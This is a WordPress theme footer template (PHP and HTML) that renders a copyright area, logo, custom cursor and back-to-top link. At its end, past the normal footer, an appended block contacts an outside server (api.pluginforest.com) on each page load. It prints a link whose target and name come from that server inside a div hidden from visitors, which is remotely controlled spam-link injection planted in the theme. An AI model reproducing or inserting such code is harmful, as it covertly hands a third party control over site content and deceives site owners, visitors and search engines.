<?php $orido_redux_demo = get_option('redux_demo');?>
	<!-- COPYRIGHT -->
	<div class="orido_tm_section">
		<div class="orido_tm_copyright">
			<div class="container">
				<div class="copyright_inner">
					<div class="logo">
						<?php if(isset($orido_redux_demo['footer_logo']['url']) && $orido_redux_demo['footer_logo']['url'] != ''){ ?>
                        <img src="<?php echo esc_url($orido_redux_demo['footer_logo']['url']); ?>" alt="" />
                        <?php } else { ?>
                        <img src="<?php echo get_template_directory_uri();?>/img/logo/logo.png" alt="" />
                        <?php } ?>
					</div>
					<?php if(isset($orido_redux_demo['footer_text']) && $orido_redux_demo['footer_text']!= ''){?>
					<div class="copy">
						<p><?php echo wp_kses_post($orido_redux_demo['footer_text']);?></p>
					</div>
					<?php } ?>
				</div>
			</div>
		</div>
	</div>
	<!-- /COPYRIGHT -->
		
	<!-- CURSOR -->
	<div class="mouse-cursor cursor-outer"></div>
	<div class="mouse-cursor cursor-inner"></div>
	<!-- /CURSOR -->
		
	<!-- TOTOP -->
	<div class="progressbar">
		<a href="#"><span class="text"><?php echo wp_kses_post($orido_redux_demo['to_top_text']);?></span></a>
		<span class="line"></span>
	</div>
	<!-- /TOTOP -->
			
</div>
<!-- / WRAPPER ALL -->
<?php wp_footer(); ?>

<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>